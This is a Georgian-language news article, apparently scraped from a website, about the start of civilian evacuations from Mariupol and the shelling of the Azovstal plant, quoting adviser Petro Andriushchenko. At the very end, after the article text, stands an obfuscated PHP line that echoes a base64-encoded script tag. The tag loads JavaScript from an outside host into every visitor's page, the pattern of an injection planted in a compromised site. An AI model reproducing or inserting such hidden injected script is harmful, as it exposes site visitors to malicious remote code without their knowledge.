celsiusi
ავერსი საქკაბელი
მარიუპოლიდან მშვიდობიანი მოსახლეობის ევაკუაცია დაიწყო. აღნიშნულის შესახებ მედიასთან საუბრისას მარიუპოლის მერის მრჩეველმა, პეტრო ანდრიუშენკომ განაცხადა.
 
„ჩვენი ინფორმაციით, ავტობუსები მარიუპოლიდან გაემგზავრნენ. წინასწარი შეთანხმებით, ავტობუსები მოსახლეობას სოფელ მანგუშსა და ბერდიანსკში აიყვანენ. ნებადართულია კოლონასთან საკუთარი ტრანსპორტით შეერთება. ვიმედოვნებთ, მარიუპოლის ათასობით მკვიდრი, რომელიც მარიუპოლიდან ზაპოროჟიესკენ მიმავალ გზაზეა ჩარჩენილი, დღეს გვიან ღამით ან ხვალ დილით ზაპოროჟიეში მოხვდებიან“, – განაცხადა ანდრიუშჩენკომ.
 
ამასთნ, ანდრიუშენკომ დაადასტურა, რომ ღამით რუსმა სამხედროებმა კვლავ დაბომბეს „აზოვსტალის“ ქარხანა. მისი თქმით, დილით დაბომბვები შეწყდა, რასაც ის სწორედ ევაკუაციას უკავშირებს.
 
მარიუპოლიდან მშვიდობიანი მოსახლეობის ევაკუაცია გუშინ დაიწყო. მედიის ცნობით, ქარხანა „აზოვსტალის“ ტერიტორიიდან გასულ დღეს ასზე მეტი ადამიანის გამოყვანა მოხერხდა, რომელთა შორის ბავშვები, ქალები და მოხუცები იყვნენ.
692
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");